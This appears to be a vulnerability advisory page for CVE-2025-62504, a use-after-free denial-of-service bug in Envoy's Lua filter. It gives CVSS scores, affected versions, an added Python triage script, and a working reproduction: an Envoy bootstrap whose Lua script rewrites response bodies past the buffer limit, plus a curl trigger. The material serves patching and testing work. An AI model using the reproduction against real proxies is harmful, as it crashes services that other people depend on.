Security Vulnerability Report
CVE-2025-62504 CVSS 6.5 MEDIUM (CNA score; NVD analysis: 7.5 HIGH)

Published: 2025-10-16 22:15:32
Last Modified: 2025-10-29 19:19:16

Description

Envoy is an open source edge and service proxy. Envoy versions earlier than 1.36.2, 1.35.6, 1.34.10, and 1.33.12 contain a use-after-free vulnerability in the Lua filter. When a Lua script executing in the response phase rewrites a response body so that its size exceeds the configured per_connection_buffer_limit_bytes (default 1MB), Envoy generates a local reply whose headers override the original response headers, leaving dangling references and causing a crash. This results in denial of service. Updating to versions 1.36.2, 1.35.6, 1.34.10, or 1.33.12 fixes the issue. Increasing per_connection_buffer_limit_bytes (and for HTTP/2 the initial_stream_window_size) or increasing per_request_buffer_limit_bytes / request_body_buffer_limit can reduce the likelihood of triggering the condition but does not correct the underlying memory safety flaw.
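The description gives two things a practitioner has to establish before acting: whether the running build falls in an affected range (the fix point differs per branch, and nothing below 1.33 has a fixed release) and whether the deployed config actually carries a response-phase Lua rewrite, together with the buffer limit that governs how easily the crash is reached. The following triage script is an added example, not code from the Envoy project or from this advisory; the version ranges come from the description above, the bootstrap it inspects is assumed to be in JSON form (which Envoy accepts alongside YAML), and the sample version string and sample bootstrap are constructed for the example. The body-rewrite detection is a string heuristic over inline Lua; scripts loaded from files are reported as not inspected by omission.

```python
"""Added triage helper for CVE-2025-62504 (example code, not part of the Envoy
project). It answers two questions raised by the advisory text:

  1. Is this Envoy build in an affected range? Fixed versions per branch are
     taken from the advisory: 1.33.12, 1.34.10, 1.35.6, 1.36.2; everything
     below the 1.33 branch has no fixed release.
  2. Does the bootstrap carry a Lua filter whose envoy_on_response hook
     rewrites the body, and which per_connection_buffer_limit_bytes applies?
     The buffer check only says how easy the crash is to reach; raising the
     limit does not fix the use-after-free.

SAMPLE_VERSION_OUTPUT and SAMPLE_BOOTSTRAP are constructed for this example.
"""
import json
import re

# Fixed release per affected branch, from the advisory.
FIXED = {
    (1, 33): (1, 33, 12),
    (1, 34): (1, 34, 10),
    (1, 35): (1, 35, 6),
    (1, 36): (1, 36, 2),
}
DEFAULT_LIMIT = 1024 * 1024  # per_connection_buffer_limit_bytes default (1MB)
LUA_TYPE = "type.googleapis.com/envoy.extensions.filters.http.lua.v3.Lua"


def parse_version(text):
    """Pull MAJOR.MINOR.PATCH out of `envoy --version` output or a bare string."""
    m = re.search(r"(?<![\w.])(\d+)\.(\d+)\.(\d+)(?![\w.])", text)
    if not m:
        raise ValueError("no semantic version in %r" % text)
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when `version` (major, minor, patch) lies in an affected range."""
    branch = version[:2]
    if branch < (1, 33):
        return True   # no fixed release exists below the 1.33 branch
    if branch > (1, 36):
        return False  # branches cut after the fix; confirm against the advisory
    return version < FIXED[branch]


def _walk(node):
    """Yield every dict nested anywhere inside a parsed config."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)


def lua_sources(node):
    """Return the Lua source strings a Lua filter config carries inline."""
    out = []
    if node.get("inline_code"):
        out.append(node["inline_code"])
    if node.get("default_source_code", {}).get("inline_string"):
        out.append(node["default_source_code"]["inline_string"])
    return out


def audit_config(bootstrap):
    """Find listeners whose Lua filter rewrites the body in the response phase.

    Returns a list of (listener_name, per_connection_buffer_limit_bytes).
    Heuristic: inline Lua that defines envoy_on_response and calls setBytes on
    a body(); scripts loaded from files are not read.
    """
    findings = []
    for listener in bootstrap.get("static_resources", {}).get("listeners", []):
        limit = int(listener.get("per_connection_buffer_limit_bytes", DEFAULT_LIMIT))
        for node in _walk(listener):
            if node.get("@type") != LUA_TYPE:
                continue
            for code in lua_sources(node):
                if "envoy_on_response" in code and "body(" in code and "setBytes(" in code:
                    findings.append((listener.get("name", "<unnamed>"), limit))
                    break
    return findings


def triage(version_text, bootstrap):
    """Combine both checks into one verdict dict."""
    version = parse_version(version_text)
    affected = is_affected(version)
    return {
        "version": version,
        "affected_build": affected,
        "risky_listeners": audit_config(bootstrap),
        "action": "upgrade" if affected else "none",
    }


# Constructed sample: a 1.35.5 build and a bootstrap with the risky
# response-phase rewrite on a listener that keeps the default buffer limit.
SAMPLE_VERSION_OUTPUT = "envoy  version: 0123abcd/1.35.5/Clean/RELEASE/BoringSSL"
SAMPLE_BOOTSTRAP = json.loads(r'''
{"static_resources": {"listeners": [{
  "name": "ingress",
  "address": {"socket_address": {"address": "0.0.0.0", "port_value": 8080}},
  "filter_chains": [{"filters": [{
    "name": "envoy.filters.network.http_connection_manager",
    "typed_config": {
      "@type": "type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager",
      "stat_prefix": "ingress_http",
      "http_filters": [
        {"name": "envoy.filters.http.lua",
         "typed_config": {
           "@type": "type.googleapis.com/envoy.extensions.filters.http.lua.v3.Lua",
           "inline_code": "function envoy_on_response(h)\n  h:body():setBytes(string.rep(\"A\", 2097152))\nend\n"}},
        {"name": "envoy.filters.http.router",
         "typed_config": {"@type": "type.googleapis.com/envoy.extensions.filters.http.router.v3.Router"}}
      ]}}]}]}]}}
''')

if __name__ == "__main__":
    print(triage(SAMPLE_VERSION_OUTPUT, SAMPLE_BOOTSTRAP))
```

Run it against the output of `envoy --version` and a bootstrap exported with `json.load`; a build that is_affected() is a must-upgrade regardless of what audit_config() finds, because the limit-related findings only describe exposure, not the fix.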

CVSS Details

CVSS Score
6.5 (CNA, secondary) / 7.5 (NVD analysis, primary)
Severity
MEDIUM (CNA) / HIGH (NVD)
CVSS Vector
CNA: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
NVD: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
The two vectors differ only in Privileges Required: the CNA scored the attacker as needing some privilege (PR:L), NVD as needing none (PR:N). Both agree the impact is availability only (C:N/I:N/A:H, scope unchanged), which is why the page header shows the lower CNA score while NVD rates the issue HIGH.
Weakness
CWE-416 (Use After Free)

Configurations (Affected Products)

CPE                                          Version range          Status
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*   < 1.33.12              VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*   >= 1.34.0, < 1.34.10   VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*   >= 1.35.0, < 1.35.6    VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*   >= 1.36.0, < 1.36.2    VULNERABLE

Note that the first range has no lower bound: every release before the 1.33 branch is affected and has no fixed point release.

PoC / Exploit Code

⚠ For Security Research Only
The following configuration is for security research and authorized testing only. It reproduces the crash on an unpatched Envoy that you operate, so it is a reproduction harness rather than a remote exploit by itself: an outside attacker needs an already deployed Lua script whose response-phase rewrite can be pushed past the buffer limit by a request or upstream response the attacker influences. That gap between "operator deploys the script" and "attacker triggers an existing script" is the difference between the CNA's PR:L and NVD's PR:N scoring.

The config below is the fragment from this page rebuilt into a minimal static bootstrap so it loads as-is; the listener port and the upstream address (127.0.0.1:8081) are placeholders to replace with your own test setup.

yaml
# CVE-2025-62504 reproduction: Envoy Lua filter use-after-free (DoS).
# The Lua script runs in the response phase and rewrites the body so that it
# exceeds per_connection_buffer_limit_bytes (default 1MB).
static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address: { address: 0.0.0.0, port_value: 8080 }
    # Default value written out explicitly; the crash needs the rewritten
    # body to exceed this limit.
    per_connection_buffer_limit_bytes: 1048576
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          stat_prefix: ingress_http
          route_config:
            name: local_route
            virtual_hosts:
            - name: backend
              domains: ["*"]
              routes:
              - match: { prefix: "/" }
                route: { cluster: upstream }
          http_filters:
          - name: envoy.filters.http.lua
            typed_config:
              "@type": type.googleapis.com/envoy.extensions.filters.http.lua.v3.Lua
              inline_code: |
                function envoy_on_response(response_handle)
                  -- Generate a response body larger than
                  -- per_connection_buffer_limit_bytes (1MB default): 2MB of "A".
                  local large_body = string.rep("A", 2 * 1024 * 1024)
                  response_handle:body():setBytes(large_body)
                end
          - name: envoy.filters.http.router
            typed_config:
              "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router
  clusters:
  - name: upstream
    type: STATIC
    load_assignment:
      cluster_name: upstream
      endpoints:
      - lb_endpoints:
        - endpoint:
            address:
              # Placeholder upstream; it must answer with a response body so
              # that body() hands the script a buffer to rewrite.
              socket_address: { address: 127.0.0.1, port_value: 8081 }

The vulnerability is triggered when:
1. A request is sent through the listener that carries the Lua filter.
2. envoy_on_response runs in the response phase.
3. The rewritten response body exceeds per_connection_buffer_limit_bytes.
4. Envoy generates a local reply whose headers override the original response headers.
5. The dangling references to the original response cause a use-after-free crash, taking the worker (and the connections it serves) down with it.

To trigger the script execution against an unpatched proxy:

shell
curl -v http://envoy-proxy:8080/

On a fixed release (1.36.2, 1.35.6, 1.34.10, 1.33.12 or later) the same request completes without a crash; the raised-limit mitigations from the description only make the over-limit condition harder to reach and are not a substitute for the upgrade.

References

https://github.com/envoyproxy/envoy/security/advisories/GHSA-gcxr-6vrp-wff3 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62504", "sourceIdentifier": "[email protected]", "published": "2025-10-16T22:15:31.527", "lastModified": "2025-10-29T19:19:16.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is an open source edge and service proxy. Envoy versions earlier than 1.36.2, 1.35.6, 1.34.10, and 1.33.12 contain a use-after-free vulnerability in the Lua filter. When a Lua script executing in the response phase rewrites a response body so that its size exceeds the configured per_connection_buffer_limit_bytes (default 1MB), Envoy generates a local reply whose headers override the original response headers, leaving dangling references and causing a crash. This results in denial of service. Updating to versions 1.36.2, 1.35.6, 1.34.10, or 1.33.12 fixes the issue. Increasing per_connection_buffer_limit_bytes (and for HTTP/2 the initial_stream_window_size) or increasing per_request_buffer_limit_bytes / request_body_buffer_limit can reduce the likelihood of triggering the condition but does not correct the underlying memory safety flaw."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": 
"HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.12", "matchCriteriaId": "50C4150D-8E29-49D4-8A55-017F19AF36C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.10", "matchCriteriaId": "54528CF8-8BFB-4428-8C61-EC347E808A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.6", "matchCriteriaId": "FDAA238B-81BE-4D15-BD97-5C4A93B2E181"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.2", "matchCriteriaId": "ECFEEDE9-7E5F-4FAF-810F-6E26F17AAB44"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-gcxr-6vrp-wff3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}